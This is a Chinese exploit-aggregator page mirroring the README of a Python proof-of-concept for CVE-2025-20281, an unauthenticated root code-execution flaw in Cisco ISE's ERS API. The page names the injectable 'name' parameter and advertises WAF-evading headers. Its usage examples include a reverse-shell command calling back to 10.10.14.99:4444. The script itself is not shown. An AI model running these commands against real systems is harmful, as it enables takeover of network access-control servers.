POC详情: 471a0aef8af35d866b84fc39e2827864013870c6

来源
https://github.com/ill-deed/Cisco-CVE-2025-20281-illdeed
关联漏洞
标题: Cisco ISE和Cisco ISE-PIC 注入漏洞 (CVE-2025-20281)
描述:Cisco ISE和Cisco ISE-PIC都是美国思科(Cisco)公司的产品。Cisco ISE是一个 NAC 解决方案。用于管理零信任架构中的端点、用户和设备对网络资源的访问。Cisco ISE-PIC是一个组件。 Cisco ISE和Cisco ISE-PIC存在注入漏洞,该漏洞源于输入验证不足,可能导致执行任意代码。
描述
Unauthenticated Remote Code Execution exploit for CVE-2025-20281 in Cisco ISE ERS API. Execute commands or launch reverse shells as root — no authentication required.
介绍
# CVE-2025-20281 — Cisco ISE ERS API Unauthenticated RCE Exploit

This repository contains a Python 3 proof-of-concept exploit for **CVE-2025-20281**, a critical vulnerability in **Cisco Identity Services Engine (ISE)** that allows **unauthenticated remote code execution (RCE) as root** via the ERS API.

---

## 🩻 Vulnerability Overview

> The Cisco ISE ERS `/ers/sdk#_` endpoint fails to validate authentication when processing user creation requests.  
> By injecting shell commands into the `name` parameter of the `InternalUser` object, attackers can achieve command execution as root.

- **CVE ID**: [CVE-2025-20281](https://nvd.nist.gov/vuln/detail/CVE-2025-20281)
- **Affected**: Cisco ISE PAN (Policy Admin Node) with ERS enabled
- **Severity**: Critical (CVSS 9.8)
- **Authentication**: None required

---

## ⚙️ Features

- ✅ Run arbitrary commands (`--cmd`)
- ✅ Quick test with `--whoami`
- ✅ Launch reverse shells (`--reverse`)
- ✅ No authentication or session token required
- ✅ SSL warning suppression and clean output
- ✅ Legitimate headers to bypass simple WAFs

---

## 🚀 Usage

```bash
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
```

### Examples

Test command:
```
python3 CVE-2025-20281.py 192.168.1.10 --whoami
```
Run custom command:
```
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
```
Reverse shell:
```
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
```

---

⚠️ Legal Disclaimer

This code is provided for educational and authorized testing purposes only.
Do not use this software against networks or systems you do not own or have permission to test.

---

## 🙏 Credits

Vulnerability: Disclosed via Cisco advisory

PoC Refactor: illdeed
文件快照

 [4.0K]  /data/pocs/471a0aef8af35d866b84fc39e2827864013870c6
├── [2.2K]  CVE-2025-20281.py
├── [1.0K]  LICENSE
└── [1.7K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。